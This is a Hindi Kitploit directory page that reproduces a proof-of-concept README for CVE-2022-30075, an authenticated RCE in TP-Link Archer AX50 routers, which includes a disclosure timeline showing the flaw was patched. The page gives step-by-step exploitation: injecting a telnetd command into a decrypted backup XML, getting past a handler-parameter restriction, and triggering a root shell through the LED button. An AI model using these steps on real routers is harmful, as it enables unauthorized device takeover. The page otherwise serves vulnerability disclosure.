Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30075 — Tp-Link Archer AX50 प्रमाणित RCE (CVE-2022-30075) | Kitploit
उपकरण/GitHubGitHub/aaronsvk/cve-2022-30075
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणहार्डवेयर सुरक्षा
GitHubaaronsvk/cve-2022-30075

CVE-2022-30075

Tp-Link Archer AX50 प्रमाणित RCE (CVE-2022-30075)

रिपॉजिटरी देखें
23543154 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-30075

Tp-Link राउटर में प्रमाणित रिमोट कोड निष्पादन

प्रभावित डिवाइस

यदि आपके Tp-Link राउटर में बैकअप और पुनर्स्थापना कार्यक्षमता है और फर्मवेयर जून 2022 से पुराना है, तो यह संभवतः असुरक्षित है

परीक्षण किया गया

Tp-Link Archer AX50, अन्य tplink राउटर बैकअप के विभिन्न प्रारूप का उपयोग कर सकते हैं और एक्सप्लॉइट को संशोधित करने की आवश्यकता हो सकती है

PoC

राउटर पर टेलनेट डेमॉन शुरू करने के लिए एक्सप्लॉइट का उपयोग करना tplink

मैनुअल शोषण

  1. राउटर वेब इंटरफ़ेस में लॉगिन करें
  2. एडवांस्ड -> सिस्टम -> बैकअप सेटिंग्स पर जाएं
  3. बैकअप फ़ाइल को डिक्रिप्ट और डीकंप्रेस करें
  • यदि आपका राउटर बैकअप फ़ाइलों के विभिन्न प्रारूप का उपयोग करता है तो आप एक्सप्लॉइट कोड (क्लास BackupParser) को संशोधित कर सकते हैं या बस github के कुछ टूल का उपयोग कर सकते हैं: https://github.com/stdnoerr/tp_link_credentials_harvester/blob/master/decrypt.py https://github.com/ret5et/tplink_backup_decrypt_2022.bin ...
  1. डिक्रिप्ट की गई xml फ़ाइल में आपको कुछ इस तरह मिल सकता है:
<button name="led_switch">
  <action>pressed</action>
  <button>ledswitch</button>
  <handler>/lib/led_switch</handler>
</button>
  • इसे इन पंक्तियों से बदलें
<button name="exploit">
  <action>pressed</action>
  <button>ledswitch</button>
  <handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
  • एक प्रतिबंध है जो पैरामीटर system.button.handler के संशोधन को रोकता है, लेकिन पैरेंट xml नोड का नाम बदलकर (जैसे name="exploit") इसे आसानी से बायपास किया जा सकता है
  • कोड निष्पादन न केवल पैरामीटर system.button.handler को बदलकर प्राप्त किया जा सकता है, बल्कि ddns.service.ip_script, firewall.include.path, uhttpd.main और अन्य का उपयोग करके भी...
  1. संशोधित बैकअप फ़ाइल को कंप्रेस और एन्क्रिप्ट करें
  2. एडवांस्ड -> सिस्टम -> रिस्टोर सेटिंग्स -> संशोधित बैकअप फ़ाइल अपलोड करें पर जाएं
  3. रीबूट के बाद, एलईडी बटन दबाएं जो इंजेक्ट किए गए कमांड /usr/sbin/telnetd -l /bin/login.sh के निष्पादन को ट्रिगर करता है
  4. राउटर पर रिमोटली लॉगिन करें: telnet 192.168.1.1

समयरेखा

15.03.2022 - भेद्यता की पहचान की गई 15.03.2022 - Tp-Link सहायता से संपर्क किया गया 16.03.2022 - Tp-Link से प्रतिक्रिया प्राप्त हुई 02.05.2022 - CVE आवंटित किया गया 27.05.2022 - Tp-Link ने सुधारी गई भेद्यता के साथ फर्मवेयर जारी किया 07.06.2022 - तकनीकी विवरण प्रकाशित किए गए

टूल डाउनलोड करें